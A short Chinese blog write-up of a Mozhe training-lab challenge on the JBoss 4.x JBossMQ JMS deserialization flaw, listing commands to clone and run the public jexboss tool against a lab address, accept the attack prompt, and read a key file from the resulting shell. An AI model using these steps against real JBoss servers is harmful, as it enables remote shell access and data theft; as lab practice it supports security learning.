0
点赞
收藏
分享

微信扫一扫

墨者JBoss 4.x JBossMQ JMS反序列化漏洞

zhyuzh3d 2022-03-16 阅读 57
gitgithub

解题思路:

1,你需要有python2 的环境,我的kali Linux上有,就直接在上面演示,按照顺序执行以下命令

## 克隆项目至本地
git clone https://github.com/joaomatosf/jexboss.git

##切换到项目目录中

cd jexboss

##安装项目所需要的依赖

pip2 install -r requires.txt

##攻击目标 

python2 jexboss.py -u http://124.70.71.251:49454/

接下来就是等待连接,这时会弹出是否攻击,输入yes

##进入shell界面,输入 cat  ../../../key.txt   拿到key

 

 

参考文献:随记(七):Jboss漏洞检测利用工具_XXR_Beta的博客-CSDN博客_jboss利用工具

举报

相关推荐

0 条评论